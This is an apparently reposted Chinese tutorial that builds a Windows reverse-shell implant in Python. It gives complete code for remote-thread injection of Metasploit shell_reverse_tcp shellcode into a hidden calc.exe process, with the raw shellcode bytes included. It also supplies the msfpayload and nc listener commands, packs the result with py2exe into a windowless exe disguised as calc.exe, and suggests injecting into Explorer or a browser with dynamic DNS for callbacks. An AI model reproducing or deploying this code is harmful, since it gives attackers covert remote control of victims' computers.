在python平台进行dll远程线程注入(代码实际写入并执行的是一段shellcode,而非DLL文件),实现一个简单的反弹shell;方法来自互联网!
准备工作:
安装有python的平台,最好是windows(顺便进行测试);安装有py2exe,以便于把python脚本转化为.exe文件。
ok,准备好了就让我们开始:
首先用msfpayload生成一段shellcode:
msfpayload windows/shell_reverse_tcp LHOST=your lhost LPORT=your port C
然后新建三个python脚本:inj.py,defines.py 和 setup.py , 内容分别如下:
[ 将上图中标记出来的反弹shell代码替换inj.py中“shell_reverse_tcp_shellcode=(”后面的相应内容;这个脚本中“victim = r"C:\windows\system32\calc.exe"” 表示把生成的shellcode注入到由calc.exe(windows自带的计算器程序)启动的进程里,可以自己修改,如资源管理器,ie什么的]
inj.py:
import sys
from ctypes import *
from defines import *
# Handle to kernel32.dll; every Win32 call in this script goes through it.
kernel32 = windll.kernel32
# flProtect for VirtualAllocEx: the remote buffer is writable AND executable,
# which is what lets the bytes written into it later run as a thread entry point.
PAGE_EXECUTE_READWRITE = 0x00000040
# STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | all specific rights, requested by inject().
PROCESS_ALL_ACCESS = (0x000F0000 | 0x00100000 | 0xFFF)
# MEM_COMMIT | MEM_RESERVE: reserve and commit the remote pages in one call.
VIRTUAL_MEM = (0x1000 | 0x2000)
# Program started below to serve as the host process for the injected bytes.
victim = r"C:\windows\system32\calc.exe"
startupinfo =STARTUPINFO()
process_information =PROCESS_INFORMATION()
creation_flags =CREATE_NEW_CONSOLE
# dwFlags = STARTF_USESHOWWINDOW and wShowWindow = SW_HIDE: the host is started
# without a visible window.
startupinfo.dwFlags =0x1
startupinfo.wShowWindow =0x0
startupinfo.cb =sizeof(startupinfo)
# The return value is not checked. If CreateProcessA fails, process_information
# stays zeroed, pid becomes 0 and inject() exits at its OpenProcess check.
kernel32.CreateProcessA(victim,
                        None,
                        None,
                        None,
                        None,
                        creation_flags,
                        None,
                        None,
                        byref(startupinfo),
                        byref(process_information))
# Process id of the freshly created host, handed to inject() further down.
pid = process_information.dwProcessId
def inject(pid,data,parameter=0):
    """Copy ``data`` into process ``pid`` and start a remote thread at its first byte.

    This is the classic four-call remote-thread injection chain --
    OpenProcess(PROCESS_ALL_ACCESS), VirtualAllocEx(RWX), WriteProcessMemory,
    CreateRemoteThread -- that endpoint monitoring commonly reports as one unit.

    pid:       target process id; converted with int() before use.
    data:      byte string that is written and then executed; len(data) is
               used as both the allocation size and the write size.
    parameter: passed through unchanged as lpParameter of the new thread.
    Returns True once CreateRemoteThread returns a handle.
    Raises SystemExit when OpenProcess or CreateRemoteThread returns NULL.
    Only those two results are checked; the VirtualAllocEx address and the
    WriteProcessMemory result are not inspected.
    """
    h_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,int(pid))
    if not h_process:
        raise SystemExit,"[!] Could not acquire a handle to PID : %s"%pid
    # Remote buffer of len(data) bytes, committed as PAGE_EXECUTE_READWRITE.
    arg_address=kernel32.VirtualAllocEx(h_process,
                                        0,
                                        len(data),
                                        VIRTUAL_MEM,
                                        PAGE_EXECUTE_READWRITE)
    # Receives the byte count written; it is filled in but never read afterwards.
    written = c_int(0)
    kernel32.WriteProcessMemory(h_process,
                                arg_address,
                                data,
                                len(data),
                                byref(written))
    thread_id = c_ulong(0)
    # The thread starts at the buffer itself, so ``data`` is executed as code.
    start_address = arg_address
    if not kernel32.CreateRemoteThread(h_process,
                                       None,
                                       0,
                                       start_address,
                                       parameter,
                                       0,
                                       byref(thread_id)):
        # The message says "Dll", but what was written is a raw byte string.
        raise SystemExit,"[!] Fail to inject Dll . Exit .. "
    # NOTE: h_process is never released with CloseHandle.
    return True
#msfpayload windows/shell_reverse_tcp LHOST=x LPORT=y
# Raw payload bytes as emitted by the msfpayload command above. The author's own
# LHOST/LPORT are encoded inside this literal, which is why the prose tells the
# reader to replace the whole string with freshly generated output instead of
# editing it in place.
shell_reverse_tcp_shellcode=(
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\xc0\xa8\x01\x0b\x68\x02\x00\xad\x9c\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
)
# Write the payload into the process created above and start it there;
# inject() terminates the script with SystemExit on failure.
inject(pid,shell_reverse_tcp_shellcode)
# Decimal PID of this injector process, used to patch the second payload below.
currentpid = str(kernel32.GetCurrentProcessId())
#./msfpayload windows/exec CMD="cmd.exe /c taskkill /PID AAAA"
# windows/exec payload; its command string is the ASCII tail of the literal,
# "cmd.exe /c taskkill /PID AAAA\0". The "AAAA" placeholder is patched below.
shellcode_kill_proc = \
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" \
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" \
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" \
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" \
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" \
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" \
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" \
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" \
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" \
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" \
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" \
"\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95" \
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" \
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e\x65" \
"\x78\x65\x20\x2f\x63\x20\x74\x61\x73\x6b\x6b\x69\x6c\x6c" \
"\x20\x2f\x50\x49\x44\x20\x41\x41\x41\x41\x00"
# Pad the PID with NUL bytes up to the 4-character placeholder width so the
# patched command keeps its length. For a PID of more than 4 digits the
# multiplier is negative, "\x00" * padding is "" and the string simply grows.
padding = 4-(len(currentpid))
replace_value = currentpid + ("\x00" * padding)
# "\x41"*4 is the literal "AAAA" placeholder from the command string.
replace_string = "\x41"*4
# In this listing the patched payload is built but never passed to inject().
shellcode_kill_proc = shellcode_kill_proc.replace(replace_string,
                                                  replace_value)
defines.py:
from ctypes import *
# map the Microsoft types
# ctypes aliases for the Win32 typedefs used by the structures below.
BYTE = c_ubyte
WORD = c_ushort
DWORD = c_ulong
LPBYTE = POINTER(c_ubyte)
# ANSI variant (c_char); matches the CreateProcessA call in inj.py.
LPTSTR = POINTER(c_char)
HANDLE = c_void_p
PVOID = c_void_p
LPVOID = c_void_p
# c_ulong is 32 bits on Windows, so these two aliases only match the Win32
# definitions inside a 32-bit Python process; on 64-bit Windows both are 64-bit.
UINT_PTR = c_ulong
SIZE_T = c_ulong
class STARTUPINFO(Structure):
    """ctypes mirror of the Win32 STARTUPINFO (ANSI) structure.

    Field order and types define the memory layout handed to CreateProcessA;
    the names themselves are not significant to ctypes, so the two fields that
    are spelled differently from the Win32 header ("dwXcountChars" for
    dwXCountChars, "lbReserved2" for lpReserved2) do not affect the layout.
    inj.py sets only cb, dwFlags and wShowWindow.
    """
    _fields_=[
        ("cb", DWORD),          # size of the structure; set via sizeof() by the caller
        ("lpReserved", LPTSTR),
        ("lpDesktop", LPTSTR),
        ("lpTitle", LPTSTR),
        ("dwX", DWORD),
        ("dwY", DWORD),
        ("dwXSize", DWORD),
        ("dwYSize", DWORD),
        ("dwXcountChars", DWORD),
        ("dwYcountChars", DWORD),
        ("dwFillAttribute", DWORD),
        ("dwFlags", DWORD),     # which of the following fields are honoured
        ("wShowWindow", WORD),  # used when dwFlags has STARTF_USESHOWWINDOW
        ("cbReserved2", WORD),
        ("lbReserved2", LPBYTE),
        ("hStdInput", HANDLE),
        ("hStdOutput", HANDLE),
        ("hStdError", HANDLE),
    ]
class PROCESS_INFORMATION(Structure):
    """ctypes mirror of the Win32 PROCESS_INFORMATION structure.

    Filled in by CreateProcessA; inj.py reads only dwProcessId from it.
    The two handles it returns are never closed by the caller.
    """
    _fields_=[
        ("hProcess", HANDLE),
        ("hThread", HANDLE),
        ("dwProcessId", DWORD),
        ("dwThreadId", DWORD),
    ]
# dwCreationFlags value passed to CreateProcessA by inj.py.
CREATE_NEW_CONSOLE = 0x00000010
setup.py:
from distutils.core import setup
import py2exe
# py2exe build: a "windows" target produces an executable without a console
# window; bundle_files 1 folds the interpreter and libraries into that single
# .exe and zipfile=None drops the separate library.zip, so dist/ holds one file.
setup(windows=["inj.pyw"],
      options={"py2exe":{"bundle_files":1}},
      zipfile=None,
      )
在本机用nc进行监控:
nc -lvp your port
将以上三个脚本copy至目标主机同一目录,然后执行:
python inj.py
测试是否shell反弹成功:
若不成功,慢慢检查吧;如果反弹成功,继续:将 inj.py 重命名为 inj.pyw (setup.py 中引用的就是这个文件名),然后执行setup.py:
python setup.py py2exe
此时你就会在相同目录下发现一个dist文件夹,里面有一个inj.exe就是我们最终想要的东东,然后重命名inj.exe为calc.exe,测试calc.exe是否会成功反弹:
上图反弹成功!试想一下:如果我们将这段反弹shellcode注入资源管理器或者浏览器这种常用且重要的进程里,然后在本机进行端口映射,本机的外网ip地址进行动态域名解析,在上面的shellcode中使用这个域名,再然后用msfconsole监听反弹。。。。
视频教程:
参考:https://www.linux520.com/bcyy/2011-01-08/73.html#ecms
https://hi.baidu.com/fandango/item/e09d55e8197a72e4fb42ba41
来源:xiao106347